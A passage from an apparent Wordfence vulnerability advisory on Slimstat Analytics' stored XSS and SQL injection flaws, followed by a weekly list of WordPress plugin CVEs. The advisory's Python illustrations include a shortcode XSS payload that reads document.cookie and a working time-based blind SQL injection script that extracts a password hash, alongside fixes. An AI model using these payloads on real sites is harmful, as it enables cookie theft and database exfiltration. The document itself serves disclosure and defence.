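As an added illustration (not code from the Slimstat plugin or from this post), the following Python sketch shows how a contributor’s value travels from the shortcode text into the class attribute, why a single-quoted shortcode attribute is enough to smuggle a double quote past the parser, and what a fixed renderer looks like. parse_atts() is a simplified stand-in for WordPress’s shortcode_parse_atts(), string_to_array() assumes comma splitting, and the SAFE_TOKEN pattern, the allow-list fix and the two constructed shortcodes are assumptions of this example rather than the vendor’s patch.

```python
import html
import re

# Simplified stand-in for WordPress shortcode_parse_atts(): it accepts
# name="value", name='value' and bare name=value. A single-quoted value may
# legitimately contain double quotes, which is what the payload below relies on.
ATTR_RE = re.compile(
    r"""(\w+)\s*=\s*"([^"]*)"|(\w+)\s*=\s*'([^']*)'|(\w+)\s*=\s*([^\s"'\]]+)"""
)
SAFE_TOKEN = re.compile(r"^[A-Za-z0-9_-]+$")  # assumption: what valid f/w tokens look like

# Constructed shortcodes: what a contributor might save in post content.
BENIGN_SHORTCODE = '[slimstat f="top-all" w="resource"]'
EVIL_SHORTCODE = "[slimstat f=\"top-all\" w='resource\" onmouseover=\"alert(document.cookie)']"


def parse_atts(shortcode: str) -> dict:
    """Return the attribute dictionary the shortcode handler would receive."""
    atts = {}
    for match in ATTR_RE.finditer(shortcode):
        groups = match.groups()
        for i in (0, 2, 4):
            if groups[i] is not None:
                atts[groups[i].lower()] = groups[i + 1]
    return atts


def string_to_array(value: str) -> list:
    """Assumed behaviour of wp_slimstat::string_to_array(): split on commas."""
    return [part.strip() for part in value.split(",") if part.strip()]


def render_vulnerable(atts: dict) -> str:
    """Mirrors the vulnerable line: $f and implode('-', $w) land inside a class
    attribute with neither input validation nor esc_attr()."""
    f = atts.get("f", "")
    w = string_to_array(atts.get("w", ""))
    return '<ul class="slimstat-shortcode ' + f + "-".join(w) + '"></ul>'


def render_hardened(atts: dict) -> str:
    """One correct fix (this example's, not necessarily the vendor's patch):
    validate the tokens on input, then escape on output as esc_attr() would.
    Either layer alone defeats this payload; using both is the WordPress norm."""
    f = atts.get("f", "")
    w = string_to_array(atts.get("w", ""))
    for token in [f, *w]:
        if token and not SAFE_TOKEN.match(token):
            raise ValueError(f"rejected shortcode attribute value: {token!r}")
    classes = html.escape("slimstat-shortcode " + f + "-".join(w), quote=True)
    return '<ul class="' + classes + '"></ul>'


def is_rejected(shortcode: str) -> bool:
    """True if the hardened renderer refuses the shortcode."""
    try:
        render_hardened(parse_atts(shortcode))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(render_vulnerable(parse_atts(EVIL_SHORTCODE)))
    # <ul class="slimstat-shortcode top-allresource" onmouseover="alert(document.cookie)"></ul>
    print(render_hardened(parse_atts(BENIGN_SHORTCODE)))
    print(is_rejected(EVIL_SHORTCODE))
```

Note that wp_kses, which filters post content saved by users without the unfiltered_html capability, only strips disallowed HTML tags and attributes; the bracketed shortcode is plain text to it, so the payload survives the save and only becomes markup when the shortcode runs at render time. That is why output escaping in the handler itself, not content filtering, is the control that matters here.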

Further examining the code, we also found a SQL Injection vulnerability within the same shortcode. Although the ‘w’ parameter is converted into an array, it is not sanitized. It is then used as the column in the database query, and although $wpdb->prepare() is called, prepare() only escapes values bound to placeholders such as %d and %s; the column is concatenated directly into the query string, so it reaches the database unescaped and an attacker can perform SQL injection.

$w = self::string_to_array($w);

The slimstat_shortcode method snippet in the wp_slimstat class

public static function get_top($_column = 'id', $_where = '', $_having = '', $_use_date_filters = true, $_as_column = '')
{
	// This function can be passed individual arguments, or an array of arguments
	if (is_array($_column)) {
		$_where            = !empty($_column['where']) ? $_column['where'] : '';
		$_having           = !empty($_column['having']) ? $_column['having'] : '';
		$_use_date_filters = !empty($_column['use_date_filters']) ? $_column['use_date_filters'] : true;
		$_as_column        = !empty($_column['as_column']) ? $_column['as_column'] : '';
		$_column           = $_column['columns'];
	}

	$group_by_column = $_column;

	if (!empty($_as_column)) {
		$_column = "$_column AS $_as_column";
	} else {
		$_as_column = $_column;
	}

	$_where = self::get_combined_where($_where, $_as_column, $_use_date_filters);

	// prepare the query: only the LIMIT %d is a bound placeholder; $_column, $_where and $_having were interpolated into the SQL string before prepare() runs
	$sql = $GLOBALS['wpdb']->prepare("
		SELECT $_column, COUNT(*) counthits
		FROM {$GLOBALS['wpdb']->prefix}slim_stats
		WHERE $_where
		GROUP BY $group_by_column $_having
		ORDER BY counthits DESC
		LIMIT 0, %d", self::$filters_normalized['misc']['limit_results']);
	return self::get_results($sql, ((!empty($_as_column) && $_as_column != $_column) ? $_as_column : $_column),
		'counthits DESC', ((!empty($_as_column) && $_as_column != $_column) ? $_as_column : $_column),
		'SUM(counthits) AS counthits');
}

The get_top method in the wp_slimstat_db class

Since no data from the SQL query was returned in the response, an attacker would need to use a time-based blind approach to extract information from the database: SQL CASE expressions that call SLEEP() only when a guessed condition holds, so that the response time of each request leaks one bit about the database contents. This is an intricate, yet frequently successful, method of extracting data when exploiting SQL Injection vulnerabilities.
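To make concrete both what prepare() does and does not protect and how the time-based technique just described turns a delay into data, here is an added example that is not from the Slimstat plugin or from this post. It reproduces the shape of the vulnerable get_top() query in SQLite, registers a SLEEP() function because SQLite lacks MySQL’s, and then recovers a secret character by character by timing each request. The wp_slim_stats and wp_users tables, the ‘c0de’ secret, the DELAY value and the allow-list in safe_top_query() are constructed assumptions of this example; the plugin’s `LIMIT 0, %d` is written as a plain LIMIT so SQLite evaluates the query as MySQL would.

```python
import sqlite3
import time

DELAY = 0.03  # seconds the oracle sleeps per true comparison; real attacks use SLEEP(5) or more
ALLOWED_COLUMNS = frozenset({"id", "ip", "resource"})  # assumption: columns the demo table exposes


def make_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for {$wpdb->prefix}slim_stats plus wp_users."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_slim_stats (id INTEGER PRIMARY KEY, ip TEXT, resource TEXT);
        INSERT INTO wp_slim_stats (ip, resource) VALUES
            ('203.0.113.5', '/'), ('203.0.113.9', '/about'), ('198.51.100.2', '/');
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', 'c0de');
    """)
    # MySQL has SLEEP(); SQLite does not, so register one for the simulation.
    conn.create_function("SLEEP", 1, lambda seconds: time.sleep(seconds) or 0)
    return conn


def build_top_query(column: str, limit: int) -> str:
    """The shape of the vulnerable get_top(): $_column is spliced into the SQL
    text before prepare() sees it, so only the LIMIT value is a bound placeholder."""
    return (
        f"SELECT {column}, COUNT(*) counthits FROM wp_slim_stats "
        f"WHERE 1=1 GROUP BY {column} ORDER BY counthits DESC LIMIT {int(limit)}"
    )


def payload(pos: int, guess: str) -> str:
    """What an attacker places in the shortcode's w attribute: a column
    expression that sleeps only when the guessed character is right."""
    return (
        f"(CASE WHEN (SELECT SUBSTR(user_pass,{pos},1) FROM wp_users WHERE ID=1)='{guess}' "
        f"THEN SLEEP({DELAY}) ELSE 0 END)"
    )


def timed_true(conn: sqlite3.Connection, column: str) -> bool:
    """The oracle: issue the page request and judge the guess by response time.
    The CASE runs at least once (per row, for the GROUP BY), so a hit costs
    at least DELAY while a miss returns almost instantly."""
    start = time.monotonic()
    conn.execute(build_top_query(column, 5)).fetchall()
    return time.monotonic() - start >= DELAY / 2


def blind_extract(conn: sqlite3.Connection, charset: str = "0123456789abcdef", max_len: int = 8) -> str:
    """Recover the secret one character at a time; stop when no guess matches."""
    found = ""
    for pos in range(1, max_len + 1):
        for guess in charset:
            if timed_true(conn, payload(pos, guess)):
                found += guess
                break
        else:
            break  # SUBSTR returned '' past the end of the string: nothing matched
    return found


def safe_top_query(column: str, limit: int) -> str:
    """An allow-list fix (this example's, not necessarily the vendor's patch):
    identifiers cannot be bound as placeholders, so validate them instead."""
    if column not in ALLOWED_COLUMNS:
        raise ValueError(f"unsupported column: {column!r}")
    return build_top_query(column, limit)


def rejects(column: str) -> bool:
    """True if the hardened builder refuses the column."""
    try:
        safe_top_query(column, 5)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_demo_db()
    print("injected query:", build_top_query(payload(1, "c"), 5))
    print("extracted via timing:", blind_extract(db))  # c0de
    print("allow-list rejects payload:", rejects(payload(1, "c")))
```

Two practical points follow from the code. First, escaping does not help with identifiers: esc_sql() or a %s placeholder would quote the column into a string literal and break the query, which is why an allow-list of known column names is the usual fix for user-chosen columns. Second, the detection side is mirrored in the oracle: a burst of requests to the same page whose response times cluster at multiples of a fixed delay is the signature a WAF or log review should look for.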

Disclosure Timeline

August 24, 2023 – Wordfence Threat Intelligence team discovers the stored XSS and SQL Injection vulnerabilities in Slimstat Analytics.
August 24, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.
August 26, 2023 – The vendor confirms the inbox for handling the discussion.
August 26, 2023 – We send over the full disclosure details for the XSS vulnerability.
August 27, 2023 – We send over the full disclosure details for the SQL injection vulnerability.
August 27, 2023 – The vendor acknowledges the report and begins working on a fix.
August 28, 2023 – The fully patched version, 5.0.10, is released.

Conclusion

In this blog post, we have detailed stored XSS and SQL Injection vulnerabilities within the Slimstat Analytics plugin affecting versions 5.0.9 and earlier. These vulnerabilities allow authenticated threat actors with contributor-level permissions or higher to inject malicious web scripts into pages, which execute when a user accesses an affected page, and to extract sensitive information from the database. Both vulnerabilities have been fully addressed in version 5.0.10 of the plugin.

We encourage WordPress users to verify that their sites are updated to the latest patched version of Slimstat Analytics.

All Wordfence users, including those running Wordfence Premium, Wordfence Care, and Wordfence Response, as well as sites still running the free version of Wordfence, are fully protected against these vulnerabilities.

If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as these vulnerabilities pose a significant risk.

For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

The post Over 100,000 WordPress Websites Affected by XSS and SQLi Vulnerabilities in Slimstat Analytics Plugin appeared first on Wordfence.

Wordfence Intelligence Weekly WordPress Vulnerability Report (August 28, 2023 to September 3, 2023)

Last week, there were 64 vulnerabilities disclosed in 61 WordPress Plugins and 2 WordPress themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 32 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected.

Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data to make the internet more secure. That is why the Wordfence Intelligence user interface, vulnerability API and webhook notifications are completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report.

Click here to sign-up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.

Total Unpatched & Patched Vulnerabilities Last Week

Patch Status Number of Vulnerabilities
Unpatched 37
Patched 27

Total Vulnerabilities by CVSS Severity Last Week

Severity Rating Number of Vulnerabilities
Low Severity 2
Medium Severity 53
High Severity 6
Critical Severity 3

Total Vulnerabilities by CWE Type Last Week

Vulnerability Type by CWE Number of Vulnerabilities
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) 29
Missing Authorization 12
Cross-Site Request Forgery (CSRF) 11
Unrestricted Upload of File with Dangerous Type 5
Server-Side Request Forgery (SSRF) 1
URL Redirection to Untrusted Site (‘Open Redirect’) 1
Improper Input Validation 1
Authorization Bypass Through User-Controlled Key 1
Improper Control of Generation of Code (‘Code Injection’) 1
Use of Less Trusted Source 1
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) 1

Researchers That Contributed to WordPress Security Last Week

Researcher Name Number of Vulnerabilities
Rio Darmawan 11
Rafie Muhammad 5
Lana Codes (Wordfence Vulnerability Researcher) 4
thiennv 3
LEE SE HYOUNG 3
Mika 2
Zlrqh 2
Dmitrii 2
László Radnai 2
Elliot 2
Marco Wotschka (Wordfence Vulnerability Researcher) 2
Bartłomiej Marek 2
Tomasz Swiadek 2
Abdi Pranata 2
Phd 1
Emili Castells 1
Pavitra Tiwari 1
Ramuel Gall (Wordfence Vulnerability Researcher) 1
FearZzZz 1
emad 1
Prasanna V Balaji 1
deokhunKim 1
yuyudhn 1
Le Ngoc Anh 1
Dipak Panchal 1
mehmet 1
Lokesh Dachepalli 1
Jonas Höbenreich 1
Enrico Marcolini 1
Animesh Gaurav 1
Jonatas Souza Villa Flor 1
Ravi Dharmawan 1

Are you a security researcher who would like to be featured in our weekly vulnerability report? You can responsibly disclose your WordPress vulnerability discoveries to us and obtain a CVE ID through this form. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the Wordfence Intelligence leaderboard along with being mentioned in our weekly vulnerability report.


WordPress Plugins with Reported Vulnerabilities Last Week

Software Name Software Slug
Activity Log aryo-activity-log
AffiliateWP AffiliateWP
All-in-One WP Migration Box Extension all-in-one-wp-migration-box-extension
All-in-One WP Migration Dropbox Extension all-in-one-wp-migration-dropbox-extension
All-in-One WP Migration Google Drive Extension all-in-one-wp-migration-gdrive-extension
All-in-One WP Migration OneDrive Extension all-in-one-wp-migration-onedrive-extension
Better Elementor Addons better-elementor-addons
Bridge Core bridge-core
Ditty – Responsive News Tickers, Sliders, and Lists ditty-news-ticker
DoLogin Security dologin
Easy Coming Soon easy-coming-soon
Easy Newsletter Signups easy-newsletter-signups
Email Encoder – Protect Email Addresses and Phone Numbers email-encoder-bundle
Fast & Effective Popups & Lead-Generation for WordPress – HollerBox holler-box
FileOrganizer – Manage WordPress and Website Files fileorganizer
Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager folders
Font Awesome 4 Menus font-awesome-4-menus
Forminator – Contact Form, Payment Form & Custom Form Builder forminator
GiveWP – Donation Plugin and Fundraising Platform give
GuruWalk Affiliates guruwalk-affiliates
Happy Addons for Elementor Pro happy-elementor-addons-pro
Import XML and RSS Feeds import-xml-feed
Localize Remote Images localize-remote-images
Login and Logout Redirect login-and-logout-redirect
LuckyWP Scripts Control luckywp-scripts-control
Maintenance Switch maintenance-switch
MakeStories (for Google Web Stories) makestories-helper
Metform Elementor Contact Form Builder metform
Multi-column Tag Map multi-column-tag-map
Olive One Click Demo Import olive-one-click-demo-import
Order Tracking – WordPress Status Tracking Plugin order-tracking
Ovic Product Bundle ovic-product-bundle
Popup Builder – Create highly converting, mobile friendly marketing popups. popup-builder
Popup box ays-popup-box
PowerPress Podcasting plugin by Blubrry powerpress
Prevent files / folders access prevent-file-access
Pricing Deals for WooCommerce pricing-deals-for-woocommerce
RSVPMaker rsvpmaker
Remove/hide Author, Date, Category Like Entry-Meta removehide-author-date-category-like-entry-meta
Responsive Gallery Grid responsive-gallery-grid
Sermon’e – Sermons Online sermone-online-sermons-management
Simple 301 Redirects by BetterLinks simple-301-redirects
Site Reviews site-reviews
Sitekit sitekit
Slimstat Analytics wp-slimstat
Smarty for WordPress smarty-for-wordpress
Snap Pixel snap-pixel
Social Media Share Buttons & Social Sharing Icons ultimate-social-media-icons
Social Share Boost social-share-boost
Surfer – WordPress Plugin surferseo
URL Shortener by MyThemeShop mts-url-shortener
Ultimate Addons for Contact Form 7 ultimate-addons-for-contact-form-7
WP Bannerize Pro wp-bannerize-pro
WP GoToWebinar wp-gotowebinar
WP Search Analytics search-analytics
WP Super Minify wp-super-minify
WP Synchro – WordPress Migration Plugin for Database & Files wpsynchro
WP Users Media wp-users-media
WP-dTree wp-dtree-30
WordPress Ecommerce For Creating Fast Online Stores – By SureCart surecart
authLdap authldap

WordPress Themes with Reported Vulnerabilities Last Week

Software Name Software Slug
Arya Multipurpose Pro arya-multipurpose-pro
Everest News Pro everest-news-pro

Vulnerability Details

Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities.

Forminator <= 1.24.6 – Unauthenticated Arbitrary File Upload

Affected Software: Forminator – Contact Form, Payment Form & Custom Form Builder
CVE ID: CVE-2023-4596
CVSS Score: 9.8 (Critical)
Researcher/s: mehmet
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513

Import XML and RSS Feeds <= 2.1.4 – Unauthenticated Remote Code Execution

Affected Software: Import XML and RSS Feeds
CVE ID: CVE-2023-4521
CVSS Score: 9.8 (Critical)
Researcher/s: Enrico Marcolini
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c0856920-5463-4dd3-a4fd-e56901a89b83

RSVPMaker <= 10.6.6 – Unauthenticated SQL Injection

Affected Software: RSVPMaker
CVE ID: CVE-2023-41652
CVSS Score: 9.8 (Critical)
Researcher/s: Ravi Dharmawan
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f655704d-70a1-40d8-ae36-39029185d262

Folders <= 2.9.2 – Authenticated (Author+) Arbitrary File Upload in handle_folders_file_upload


Give – Donation Plugin <= 2.33.0 – Authenticated (Give Manager+) Privilege Escalation

Affected Software: GiveWP – Donation Plugin and Fundraising Platform
CVE ID: CVE-2023-41665
CVSS Score: 7.2 (High)
Researcher/s: Rafie Muhammad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/22ff4b09-063b-425e-9d59-be2e5d283186

Olive One Click Demo Import <= 1.0.9 – Authenticated (Administrator+) Arbitrary File Upload in olive_one_click_demo_import_save_file

Affected Software: Olive One Click Demo Import
CVE ID: CVE-2023-29102
CVSS Score: 7.2 (High)
Researcher/s: deokhunKim
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/4f3e3311-11d8-4e4f-9d99-36533fe44d56

DoLogin Security <= 3.6 – Unauthenticated Stored Cross-Site Scripting

Affected Software: DoLogin Security
CVE ID: CVE-2023-4549
CVSS Score: 7.2 (High)
Researcher/s: Bartłomiej Marek, Tomasz Swiadek
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ad34d657-da59-46ff-a54a-64e6c8974b69

Prevent files / folders access <= 2.5.1 – Authenticated (Administrator+) Arbitrary File Upload in mo_media_restrict_page

Affected Software: Prevent files / folders access
CVE ID: CVE-2023-4238
CVSS Score: 7.2 (High)
Researcher/s: Dmitrii
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b266bd10-dbc6-4058-a5b2-1578c0814cb4

Import XML and RSS Feeds <= 2.1.3 – Authenticated (Admin+) Arbitrary File Upload

Affected Software: Import XML and RSS Feeds
CVE ID: CVE-2023-4300
CVSS Score: 7.2 (High)
Researcher/s: Jonatas Souza Villa Flor
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f45b4c43-c6c4-41da-bd59-9a355800815a

Easy Newsletter Signups <= 1.0.4 – Missing Authorization

Affected Software: Easy Newsletter Signups
CVE ID: CVE-2023-41664
CVSS Score: 6.5 (Medium)
Researcher/s: Emili Castells
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/288946ae-6e58-42e6-89d1-8951539728d3

Slimstat Analytics <= 5.0.9 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Slimstat Analytics
CVE ID: CVE-2023-4597
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/52aee4b8-f494-4eeb-8357-71ce8d5bc656

Sitekit <= 1.3 – Authenticated (Contributor+) Stored Cross-Site Scripting via ‘sitekit_iframe’ shortcode

Affected Software: Sitekit
CVE ID: CVE-2023-27628
CVSS Score: 6.4 (Medium)
Researcher/s: Mika
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/7f0be29a-7896-4166-a2a6-64f99d845236

Font Awesome 4 Menus <= 4.7.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Font Awesome 4 Menus
CVE ID: CVE-2023-4718
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/dc59510c-6eaf-4526-8acb-c07e39923ad9

Email Encoder <= 2.1.7 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: Email Encoder – Protect Email Addresses and Phone Numbers
CVE ID: CVE-2023-4599
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e90f04e4-eb4c-4822-89c6-79f553987c37

Login and Logout Redirect <= 2.0.2 – Open Redirect

Affected Software: Login and Logout Redirect
CVE ID: CVE-2023-41648
CVSS Score: 6.1 (Medium)
Researcher/s: Phd
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/09a0639e-4b14-4dc9-a50c-d18234faa7b1

Arya Multipurpose Pro <= 1.0.8 – Reflected Cross-Site Scripting

Affected Software: Arya Multipurpose Pro
CVE ID: CVE-2023-41237
CVSS Score: 6.1 (Medium)
Researcher/s: László Radnai
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/22cfbaa1-5412-4944-899c-7ae41d017384

Social Media & Share Icons <= 2.8.3 – Reflected Cross-Site Scripting

Affected Software: Social Media Share Buttons & Social Sharing Icons
CVE ID: CVE-2023-41238
CVSS Score: 6.1 (Medium)
Researcher/s: FearZzZz
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3a8998db-ffc2-40b2-a191-09380984adac

URL Shortener by MyThemeShop <= 1.0.17 – Reflected Cross-Site Scripting via ‘page’

Affected Software: URL Shortener by MyThemeShop
CVE ID: CVE-2023-30472
CVSS Score: 6.1 (Medium)
Researcher/s: LEE SE HYOUNG
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/52c2837e-8947-4ce9-bda5-e0c2f831fb36

Sermon’e – Sermons Online <= 1.0.0 – Reflected Cross-Site Scripting

Affected Software: Sermon’e – Sermons Online
CVE ID: CVE-2023-41653
CVSS Score: 6.1 (Medium)
Researcher/s: yuyudhn
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5c17678e-6598-4e80-b121-beae822b9f81

WP-dTree <= 4.4.5 – Reflected Cross-Site Scripting

Affected Software: WP-dTree
CVE ID: CVE-2023-41662
CVSS Score: 6.1 (Medium)
Researcher/s: Le Ngoc Anh
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6c01da54-fbbe-42f9-a76e-8e823027d62a

Everest News Pro <= 1.1.7 – Reflected Cross-Site Scripting

Affected Software: Everest News Pro
CVE ID: CVE-2023-41235
CVSS Score: 6.1 (Medium)
Researcher/s: László Radnai
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bb967453-59d6-4b03-8c75-1906b99bff80

Bridge Core <= 3.0.9 – Reflected Cross-Site Scripting

Affected Software: Bridge Core
CVE ID: CVE-2023-40333
CVSS Score: 6.1 (Medium)
Researcher/s: Rafie Muhammad
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bc698c40-4a2b-4dab-93f0-647e4db79d2c

Ditty <= 3.1.24 – Reflected Cross-Site Scripting

Affected Software: Ditty – Responsive News Tickers, Sliders, and Lists
CVE ID: CVE-2023-4148
CVSS Score: 6.1 (Medium)
Researcher/s: Animesh Gaurav
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/cabf7aae-0673-4358-a2df-0ca22c8432b5

Happy Elementor Addons Pro <= 2.8.0 – Reflected Cross-Site Scripting

Affected Software: Happy Addons for Elementor Pro
CVE ID: CVE-2023-41236
CVSS Score: 6.1 (Medium)
Researcher/s: Rafie Muhammad
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d536d3a8-9ac5-4ea9-8c65-16ad8b3a7106

Ultimate Addons for Contact Form 7 <= 3.1.32 – Reflected Cross-Site Scripting via ‘page’

Affected Software: Ultimate Addons for Contact Form 7
CVE ID: CVE-2023-30493
CVSS Score: 6.1 (Medium)
Researcher/s: LEE SE HYOUNG
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d857324c-94c9-471a-9da8-0b8c9bb50262

Order Tracking Pro <= 3.3.6 – Reflected Cross-Site Scripting

Affected Software: Order Tracking – WordPress Status Tracking Plugin
CVE ID: CVE-2023-4471
CVSS Score: 6.1 (Medium)
Researcher/s: Marco Wotschka
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ed64d0ff-4f49-4c18-86ec-2c6fbd559d2e

WP Bannerize Pro <= 1.6.9 – Reflected Cross-Site Scripting

Affected Software: WP Bannerize Pro
CVE ID: CVE-2023-41663
CVSS Score: 6.1 (Medium)
Researcher/s: thiennv
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/edc35f8c-f916-433e-9d3f-4992e8c9d7cd

WP Search Analytics <= 1.4.7 – Reflected Cross-Site Scripting via ‘render_stats_page’

Affected Software: WP Search Analytics
CVE ID: CVE-2023-30471
CVSS Score: 6.1 (Medium)
Researcher/s: LEE SE HYOUNG
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f6433a17-0017-46a9-a8e6-4d4a4a55f2db

PowerPress <= 11.0.6 – Authenticated (Contributor+) Server-Side Request Forgery via wp_ajax_powerpress_media_info

Affected Software: PowerPress Podcasting plugin by Blubrry
CVE ID: CVE-2023-41239
CVSS Score: 5.4 (Medium)
Researcher/s: Mika
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/031c31b2-6e27-47bb-9f63-2bbaa1edbbb2

Site Reviews <= 6.10.2 – Missing Authorization

Affected Software: Site Reviews
CVE ID: CVE Unknown
CVSS Score: 5.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/1accc41e-41d2-49e3-a80a-6b95b02cb42e

Responsive Gallery Grid <= 2.3.10 – Cross-Site Request Forgery

Affected Software: Responsive Gallery Grid
CVE ID: CVE-2023-41659
CVSS Score: 5.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3abe2de8-9127-4ef0-9194-cf331b20868a

LuckyWP Scripts Control <= 1.2.1 – Missing Authorization via multiple AJAX actions

Affected Software: LuckyWP Scripts Control
CVE ID: CVE-2023-29239
CVSS Score: 5.4 (Medium)
Researcher/s: Elliot
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3ed93c5c-38bb-4e84-8fe8-03dd75b4d9f3

Maintenance Switch <= 1.5.2 – Cross-Site Request Forgery via ‘admin_action_request’

Affected Software: Maintenance Switch
CVE ID: CVE-2023-29235
CVSS Score: 5.4 (Medium)
Researcher/s: Elliot
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6f14f19d-95b3-474b-a2ea-d846c85644cd

Simple 301 Redirects <= 2.0.7 – Cross-Site Request Forgery via ‘clicked’

Affected Software: Simple 301 Redirects by BetterLinks
CVE ID: CVE Unknown
CVSS Score: 5.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/9945c85b-a97a-4ad0-9d0a-69faf157563a

Surfer <= 1.1.2.298 – Missing Authorization

Affected Software: Surfer – WordPress Plugin
CVE ID: CVE-2023-35037
CVSS Score: 5.4 (Medium)
Researcher/s: Jonas Höbenreich
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c06f9f6d-3cd0-4700-834b-435a99983453

Pricing Deals for WooCommerce <= 2.0.3.2 – Missing Authorization via vtprd_ajax_clone_rule

Affected Software: Pricing Deals for WooCommerce
CVE ID: CVE-2023-41240
CVSS Score: 5.3 (Medium)
Researcher/s: thiennv
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/1101bfe6-2075-4f44-933b-6d9f372100a2

Ovic Product Bundle <= 1.1.2 – Missing Authorization

Affected Software: Ovic Product Bundle
CVE ID: CVE-2023-41649
CVSS Score: 5.3 (Medium)
Researcher/s: thiennv
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5657ffe2-7d04-4834-bcec-ab6afaeda7df

Multiple ServMask Plugins <= (Various Versions) – Missing Authorization to Access Token Update


Localize Remote Images <= 1.0.9 – Cross-Site Request Forgery via admin menu

Affected Software: Localize Remote Images
CVE ID: CVE-2023-41244
CVSS Score: 5.3 (Medium)
Researcher/s: Lokesh Dachepalli
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ab96123e-17aa-461f-b460-e8eba82c78e1

Multi-column Tag Map <= 17.0.26 – Missing Authorization

Affected Software: Multi-column Tag Map
CVE ID: CVE-2023-41651
CVSS Score: 5.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d2a60cb2-fe7d-4c51-9995-5cb4682d9d26

Activity Log <= 2.8.7 – IP Address Spoofing

Affected Software: Activity Log
CVE ID: CVE-2023-4281
CVSS Score: 5.3 (Medium)
Researcher/s: Bartłomiej Marek, Tomasz Swiadek
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/de821236-f878-46a4-9265-bcf6e8661910

